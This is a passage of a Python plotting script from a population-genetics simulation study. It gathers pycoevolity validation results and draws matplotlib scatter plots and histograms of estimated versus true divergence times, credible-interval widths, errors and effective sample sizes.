include_variable_only = True):
dpp_500k_sim_dirs = []
dpp_500k_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-0100-500k*"))))
dirs_to_keep = [d for d in dpp_500k_sim_dirs if ((not d.endswith("l")) and (not d.endswith("singleton")))]
dpp_500k_sim_dirs = dirs_to_keep
dpp_500k_results_paths = []
vo_dpp_500k_results_paths = []
for sim_dir in dpp_500k_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
vo_dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"var-only-results.csv.gz")))
)
)
if not include_variable_only:
results_batches = {
"500k": dpp_500k_results_paths,
}
row_keys = [
"500k",
]
return row_keys, results_batches
results_batches = {
"500k": dpp_500k_results_paths,
"500k variable only": vo_dpp_500k_results_paths,
}
row_keys = [
"500k",
"500k variable only",
]
return row_keys, results_batches
def get_filtered_data_results_paths(
validatition_sim_dir,
include_variable_only = True):
dpp_500k_sim_dirs = []
dpp_500k_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-0100-500k-*singleton"))))
dirs_to_keep = sorted(dpp_500k_sim_dirs, reverse = True)
dirs_to_keep.insert(0, os.path.join(validatition_sim_dir, "03pairs-dpp-root-0100-500k"))
dpp_500k_sim_dirs = dirs_to_keep
dpp_500k_results_paths = []
vo_dpp_500k_results_paths = []
for sim_dir in dpp_500k_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
vo_dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"var-only-results.csv.gz")))
)
)
if not include_variable_only:
results_batches = {
"500k": dpp_500k_results_paths,
}
row_keys = [
"500k",
]
return row_keys, results_batches
results_batches = {
"500k": dpp_500k_results_paths,
"500k variable only": vo_dpp_500k_results_paths,
}
row_keys = [
"500k",
"500k variable only",
]
return row_keys, results_batches
def ci_width_iter(results, parameter_str):
n = len(results["eti_95_upper_{0}".format(parameter_str)])
for i in range(n):
upper = float(results["eti_95_upper_{0}".format(parameter_str)][i])
lower = float(results["eti_95_lower_{0}".format(parameter_str)][i])
yield upper - lower
def absolute_error_iter(results, parameter_str):
n = len(results["true_{0}".format(parameter_str)])
for i in range(n):
t = float(results["true_{0}".format(parameter_str)][i])
e = float(results["mean_{0}".format(parameter_str)][i])
yield math.fabs(t - e)
def plot_ess_versus_error(
parameters,
parameter_label = "divergence time",
plot_file_prefix = None,
include_all_sizes_fixed = True,
include_root_size_fixed = False):
_LOG.info("Generating ESS vs CI scatter plots for {0}...".format(parameter_label))
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
assert(len(parameters) == len(set(parameters)))
if not plot_file_prefix:
plot_file_prefix = parameters[0]
plot_file_prefix_ci = plot_file_prefix + "-ess-vs-ci-width"
plot_file_prefix_error = plot_file_prefix + "-ess-vs-error"
row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
include_all_sizes_fixed = include_all_sizes_fixed,
include_root_size_fixed = include_root_size_fixed,
include_variable_only = True)
# Very inefficient, but parsing all results to get min/max for parameter
ess_min = float('inf')
ess_max = float('-inf')
ci_width_min = float('inf')
ci_width_max = float('-inf')
error_min = float('inf')
error_max = float('-inf')
for key, results_batch in results_batches.items():
for sim_dir, results_paths in results_batch:
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
for parameter_str in parameters:
ci_widths = tuple(ci_width_iter(results, parameter_str))
errors = tuple(absolute_error_iter(results, parameter_str))
ess_min = min(ess_min,
min(float(x) for x in results["ess_sum_{0}".format(parameter_str)]))
ess_max = max(ess_max,
max(float(x) for x in results["ess_sum_{0}".format(parameter_str)]))
ci_width_min = min(ci_width_min, min(ci_widths))
ci_width_max = max(ci_width_max, max(ci_widths))
error_min = min(error_min, min(errors))
error_max = max(error_max, max(errors))
ess_axis_buffer = math.fabs(ess_max - ess_min) * 0.05
ess_axis_min = ess_min - ess_axis_buffer
ess_axis_max = ess_max + ess_axis_buffer
ci_width_axis_buffer = math.fabs(ci_width_max - ci_width_min) * 0.05
ci_width_axis_min = ci_width_min - ci_width_axis_buffer
ci_width_axis_max = ci_width_max + ci_width_axis_buffer
error_axis_buffer = math.fabs(error_max - error_min) * 0.05
error_axis_min = error_min - error_axis_buffer
error_axis_max = error_max + error_axis_buffer
plt.close('all')
fig = plt.figure(figsize = (9, 6.5))
nrows = len(results_batches)
ncols = len(results_batches.values()[0])
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
x = []
y = []
for parameter_str in parameters:
x.extend(float(x) for x in results["ess_sum_{0}".format(parameter_str)])
y.extend(ci_width_iter(results, parameter_str))
assert(len(x) == len(y))
ax = plt.subplot(gs[row_idx, col_idx])
line, = ax.plot(x, y)
plt.setp(line,
marker = 'o',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 2.5,
linestyle = '',
zorder = 100,
rasterized = True)
ax.set_xlim(ess_axis_min, ess_axis_max)
ax.set_ylim(ci_width_axis_min, ci_width_axis_max)
if row_idx == 0:
if root_alpha_setting == "fixed-all":
pop_sizes = results["mean_pop_size_c1sp1"]
assert(len(set(pop_sizes)) == 1)
col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
elif root_alpha_setting == "fixed":
col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
else:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
transform = ax.transAxes)
if col_idx == last_col_idx:
ax.text(1.015, 0.5,
row_key,
horizontalalignment = "left",
verticalalignment = "center",
rotation = 270.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.001,
"Effective sample size of {0}".format(parameter_label),
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
"CI width {0}".format(parameter_label),
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_path = os.path.join(plot_dir,
"{0}-scatter.pdf".format(plot_file_prefix_ci))
plt.savefig(plot_path, dpi=600)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
_LOG.info("Generating ESS vs error scatter plots for {0}...".format(parameter_label))
plt.close('all')
fig = plt.figure(figsize = (9, 6.5))
nrows = len(results_batches)
ncols = len(results_batches.values()[0])
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
x = []
y = []
for parameter_str in parameters:
x.extend(float(x) for x in results["ess_sum_{0}".format(parameter_str)])
y.extend(absolute_error_iter(results, parameter_str))
assert(len(x) == len(y))
ax = plt.subplot(gs[row_idx, col_idx])
line, = ax.plot(x, y)
plt.setp(line,
marker = 'o',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 2.5,
linestyle = '',
zorder = 100,
rasterized = True)
ax.set_xlim(ess_axis_min, ess_axis_max)
ax.set_ylim(error_axis_min, error_axis_max)
if row_idx == 0:
if root_alpha_setting == "fixed-all":
pop_sizes = results["mean_pop_size_c1sp1"]
assert(len(set(pop_sizes)) == 1)
col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
elif root_alpha_setting == "fixed":
col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
else:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
transform = ax.transAxes)
if col_idx == last_col_idx:
ax.text(1.015, 0.5,
row_key,
horizontalalignment = "left",
verticalalignment = "center",
rotation = 270.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.001,
"Effective sample size of {0}".format(parameter_label),
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
"Absolute error of {0}".format(parameter_label),
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
plot_path = os.path.join(plot_dir,
"{0}-scatter.pdf".format(plot_file_prefix_error))
plt.savefig(plot_path, dpi=600)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_scatter_plots(
parameters,
parameter_label = "divergence time",
parameter_symbol = "\\tau",
plot_file_prefix = None,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = False,
include_variable_only = True):
if int(bool(linked_loci)) + int(missing_data) + int(filtered_data) > 1:
raise Exception("Can only specify linked_loci, missing_data, or filtered_data")
_LOG.info("Generating scatter plots for {0}...".format(parameter_label))
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)u?l')
missing_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_missing>\d+)missing')
filtered_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_singleton>\d+)singleton')
assert(len(parameters) == len(set(parameters)))
if not plot_file_prefix:
plot_file_prefix = parameters[0]
row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
include_all_sizes_fixed = include_all_sizes_fixed,
include_root_size_fixed = include_root_size_fixed,
include_variable_only = include_variable_only)
if linked_loci:
row_keys, results_batches = get_linked_loci_results_paths(
project_util.VAL_DIR,
data_set_size = linked_loci,
include_variable_only = include_variable_only,
include_unlinked_only = True)
if missing_data:
row_keys, results_batches = get_missing_data_results_paths(
project_util.VAL_DIR,
include_variable_only = include_variable_only)
if filtered_data:
row_keys, results_batches = get_filtered_data_results_paths(
project_util.VAL_DIR,
include_variable_only = include_variable_only)
# Very inefficient, but parsing all results to get min/max for parameter
parameter_min = float('inf')
parameter_max = float('-inf')
for key, results_batch in results_batches.items():
for sim_dir, results_paths in results_batch:
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
for parameter_str in parameters:
parameter_min = min(parameter_min,
min(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_min = min(parameter_min,
min(float(x) for x in results["mean_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["mean_{0}".format(parameter_str)]))
axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
axis_min = parameter_min - axis_buffer
axis_max = parameter_max + axis_buffer
plt.close('all')
if missing_data or filtered_data:
fig = plt.figure(figsize = (9, 4.0))
elif linked_loci:
if include_variable_only:
fig = plt.figure(figsize = (7.25, 6.5))
else:
fig = plt.figure(figsize = (7.25, 4.2))
else:
fig = plt.figure(figsize = (9, 6.5))
nrows = len(results_batches)
ncols = len(results_batches.values()[0])
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
x = []
y = []
y_upper = []
y_lower = []
for parameter_str in parameters:
x.extend(float(x) for x in results["true_{0}".format(parameter_str)])
y.extend(float(x) for x in results["mean_{0}".format(parameter_str)])
y_lower.extend(float(x) for x in results["eti_95_lower_{0}".format(parameter_str)])
y_upper.extend(float(x) for x in results["eti_95_upper_{0}".format(parameter_str)])
assert(len(x) == len(y))
assert(len(x) == len(y_lower))
assert(len(x) == len(y_upper))
proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
x,
y_lower,
y_upper)
rmse = pycoevolity.stats.root_mean_square_error(x, y)
_LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
_LOG.info("RMSE = {0:.2e}".format(rmse))
ax = plt.subplot(gs[row_idx, col_idx])
line = ax.errorbar(
x = x,
y = y,
yerr = get_errors(y, y_lower, y_upper),
ecolor = '0.65',
elinewidth = 0.5,
capsize = 0.8,
barsabove = False,
marker = 'o',
linestyle = '',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 2.5,
zorder = 100,
rasterized = True)
# line, = ax.plot(x, y)
# plt.setp(line,
# marker = 'o',
# markerfacecolor = 'none',
# markeredgecolor = '0.35',
# markeredgewidth = 0.7,
# linestyle = '',
# zorder = 100)
ax.set_xlim(axis_min, axis_max)
ax.set_ylim(axis_min, axis_max)
identity_line, = ax.plot(
[axis_min, axis_max],
[axis_min, axis_max])
plt.setp(identity_line,
color = '0.7',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
ax.text(0.02, 0.97,
"\\scriptsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
parameter_symbol,
proportion_within_ci),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
ax.text(0.02, 0.87,
# "\\scriptsize\\noindent$\\textrm{{\\sffamily RMSE}} = {0:.2e}$".format(
"\\scriptsize\\noindent RMSE = {0:.2e}".format(
rmse),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
if row_idx == 0:
if linked_loci:
# locus_size = 1
locus_size_matches = locus_size_pattern.findall(sim_dir)
# if locus_size_matches:
assert len(locus_size_matches) == 1
locus_size = int(locus_size_matches[0])
col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
elif missing_data:
percent_missing = 0.0
missing_matches = missing_data_pattern.findall(sim_dir)
if missing_matches:
assert len(missing_matches) == 1
percent_missing = float("." + missing_matches[0]) * 100.0
col_header = "{0:.0f}\\% missing data".format(percent_missing)
elif filtered_data:
percent_sampled = 100.0
filtered_matches = filtered_data_pattern.findall(sim_dir)
if filtered_matches:
assert len(filtered_matches) == 1
percent_sampled = float("." + filtered_matches[0]) * 100.0
col_header = "{0:.0f}\\% singleton patterns".format(percent_sampled)
else:
if root_alpha_setting == "fixed-all":
pop_sizes = results["mean_pop_size_c1sp1"]
assert(len(set(pop_sizes)) == 1)
col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
elif root_alpha_setting == "fixed":
col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
else:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
transform = ax.transAxes)
if col_idx == last_col_idx:
ax.text(1.015, 0.5,
row_key,
horizontalalignment = "left",
verticalalignment = "center",
rotation = 270.0,
transform = ax.transAxes)
# show only the outside spines
# all_axes = fig.get_axes()
# for ax in all_axes:
# for sp in ax.spines.values():
# sp.set_visible(False)
# if ax.is_first_row():
# ax.spines['top'].set_visible(True)
# if ax.is_last_row():
# ax.spines['bottom'].set_visible(True)
# if ax.is_first_col():
# ax.spines['left'].set_visible(True)
# if ax.is_last_col():
# ax.spines['right'].set_visible(True)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.001,
"True {0} (${1}$)".format(parameter_label, parameter_symbol),
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
"Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol),
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
if linked_loci:
if include_variable_only:
gs.update(left = 0.11, right = 0.97, bottom = 0.08, top = 0.97)
else:
gs.update(left = 0.11, right = 0.97, bottom = 0.13, top = 0.95)
elif missing_data or filtered_data:
gs.update(left = 0.09, right = 0.98, bottom = 0.1, top = 0.96)
else:
gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_path = os.path.join(plot_dir,
"{0}-scatter.pdf".format(plot_file_prefix))
plt.savefig(plot_path, dpi=600)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_root_1000_500k_scatter_plots(
parameters,
parameter_label = "divergence time",
parameter_symbol = "\\tau",
plot_file_prefix = None):
_LOG.info("Generating scatter plots for {0}...".format(parameter_label))
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
assert(len(parameters) == len(set(parameters)))
if not plot_file_prefix:
plot_file_prefix = parameters[0]
row_keys, results_batches = get_root_1000_500k_results_paths(project_util.VAL_DIR)
# Very inefficient, but parsing all results to get min/max for parameter
parameter_min = float('inf')
parameter_max = float('-inf')
for key, results_batch in results_batches.items():
for sim_dir, results_paths in results_batch:
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
for parameter_str in parameters:
parameter_min = min(parameter_min,
min(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["true_{0}".format(parameter_str)]))
parameter_min = min(parameter_min,
min(float(x) for x in results["mean_{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["mean_{0}".format(parameter_str)]))
axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
axis_min = parameter_min - axis_buffer
axis_max = parameter_max + axis_buffer
plt.close('all')
fig = plt.figure(figsize = (3.5, 3.0))
gs = gridspec.GridSpec(1, 1,
wspace = 0.0,
hspace = 0.0)
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
x = []
y = []
y_upper = []
y_lower = []
for parameter_str in parameters:
x.extend(float(x) for x in results["true_{0}".format(parameter_str)])
y.extend(float(x) for x in results["mean_{0}".format(parameter_str)])
y_lower.extend(float(x) for x in results["eti_95_lower_{0}".format(parameter_str)])
y_upper.extend(float(x) for x in results["eti_95_upper_{0}".format(parameter_str)])
assert(len(x) == len(y))
assert(len(x) == len(y_lower))
assert(len(x) == len(y_upper))
proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
x,
y_lower,
y_upper)
rmse = pycoevolity.stats.root_mean_square_error(x, y)
_LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
_LOG.info("RMSE = {0:.2e}".format(rmse))
ax = plt.subplot(gs[row_idx, col_idx])
line = ax.errorbar(
x = x,
y = y,
yerr = get_errors(y, y_lower, y_upper),
ecolor = '0.65',
elinewidth = 0.5,
capsize = 0.8,
barsabove = False,
marker = 'o',
linestyle = '',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 2.5,
zorder = 100,
rasterized = True)
ax.set_xlim(axis_min, axis_max)
ax.set_ylim(axis_min, axis_max)
identity_line, = ax.plot(
[axis_min, axis_max],
[axis_min, axis_max])
plt.setp(identity_line,
color = '0.7',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
ax.text(0.01, 1.01,
"\\normalsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
parameter_symbol,
proportion_within_ci),
horizontalalignment = "left",
verticalalignment = "bottom",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
ax.text(0.99, 1.01,
"\\normalsize\\noindent RMSE = {0:.2e}".format(
rmse),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes,
size = 6.0,
zorder = 200)
ax.set_xlabel("True {0} (${1}$)".format(parameter_label, parameter_symbol))
ax.set_ylabel("Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol))
if row_idx == 0:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
# ax.text(0.5, 1.0,
# col_header,
# horizontalalignment = "center",
# verticalalignment = "bottom",
# transform = ax.transAxes)
if col_idx == last_col_idx:
pass
# ax.text(1.0, 0.5,
# row_key,
# horizontalalignment = "left",
# verticalalignment = "center",
# rotation = 270.0,
# transform = ax.transAxes)
gs.update(left = 0.19, right = 0.99, bottom = 0.14, top = 0.92)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_path = os.path.join(plot_dir,
"root-1000-500k-{0}-scatter.pdf".format(plot_file_prefix))
plt.savefig(plot_path, dpi=600)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_histograms(
parameters,
parameter_label = "Number of variable sites",
plot_file_prefix = None,
parameter_discrete = True,
range_key = "range",
number_of_digits = 0,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True,
linked_loci = None,
row_indices = None):
_LOG.info("Generating histograms for {0}...".format(parameter_label))
assert(len(parameters) == len(set(parameters)))
if not plot_file_prefix:
plot_file_prefix = parameters[0]
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)u?l')
row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
include_all_sizes_fixed = include_all_sizes_fixed,
include_root_size_fixed = include_root_size_fixed,
include_variable_only = include_variable_only)
if linked_loci:
row_keys, results_batches = get_linked_loci_results_paths(
project_util.VAL_DIR,
data_set_size = linked_loci,
include_variable_only = include_variable_only,
include_unlinked_only = True)
if not row_indices:
row_indices = list(range(len(row_keys)))
# Very inefficient, but parsing all results to get min/max for parameter
parameter_min = float('inf')
parameter_max = float('-inf')
for row_idx in row_indices:
key = row_keys[row_idx]
results_batch = results_batches[key]
for sim_dir, results_paths in results_batch:
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
for parameter_str in parameters:
parameter_min = min(parameter_min,
min(float(x) for x in results["{0}".format(parameter_str)]))
parameter_max = max(parameter_max,
max(float(x) for x in results["{0}".format(parameter_str)]))
axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
axis_min = parameter_min - axis_buffer
axis_max = parameter_max + axis_buffer
plt.close('all')
nrows = len(row_indices)
ncols = len(results_batches.values()[0])
w = 1.6
h = 1.5
fig_width = (ncols * w) + 1.0
fig_height = (nrows * h) + 0.7
fig = plt.figure(figsize = (fig_width, fig_height))
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
hist_bins = None
for fig_row_idx, row_idx in enumerate(row_indices):
row_key = row_keys[row_idx]
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
fig_row_idx, col_idx, sim_dir, len(results_paths)))
x = []
for parameter_str in parameters:
if parameter_discrete:
x.extend(int(x) for x in results["{0}".format(parameter_str)])
else:
x.extend(float(x) for x in results["{0}".format(parameter_str)])
summary = pycoevolity.stats.get_summary(x)
_LOG.info("0.025, 0.975 quantiles: {0:.2f}, {1:.2f}".format(
summary["qi_95"][0],
summary["qi_95"][1]))
x_range = (parameter_min, parameter_max)
if parameter_discrete:
x_range = (int(parameter_min), int(parameter_max))
ax = plt.subplot(gs[fig_row_idx, col_idx])
n, bins, patches = ax.hist(x,
# normed = True,
weights = [1.0 / float(len(x))] * len(x),
bins = hist_bins,
range = x_range,
cumulative = False,
histtype = 'bar',
align = 'mid',
orientation = 'vertical',
rwidth = None,
log = False,
color = None,
edgecolor = '0.5',
facecolor = '0.5',
fill = True,
hatch = None,
label = None,
linestyle = None,
linewidth = None,
zorder = 10,
)
if hist_bins is None:
hist_bins = bins
ax.text(0.98, 0.98,
"\\scriptsize {mean:,.{ndigits}f} ({lower:,.{ndigits}f}--{upper:,.{ndigits}f})".format(
# int(round(summary["mean"])),
# int(round(summary[range_key][0])),
# int(round(summary[range_key][1]))),
mean = summary["mean"],
lower = summary[range_key][0],
upper = summary[range_key][1],
ndigits = number_of_digits),
horizontalalignment = "right",
verticalalignment = "top",
transform = ax.transAxes,
zorder = 200)
if fig_row_idx == 0:
if linked_loci:
# locus_size = 1
locus_size_matches = locus_size_pattern.findall(sim_dir)
# if locus_size_matches:
assert len(locus_size_matches) == 1
locus_size = int(locus_size_matches[0])
col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
else:
if root_alpha_setting == "fixed-all":
pop_sizes = results["mean_pop_size_c1sp1"]
assert(len(set(pop_sizes)) == 1)
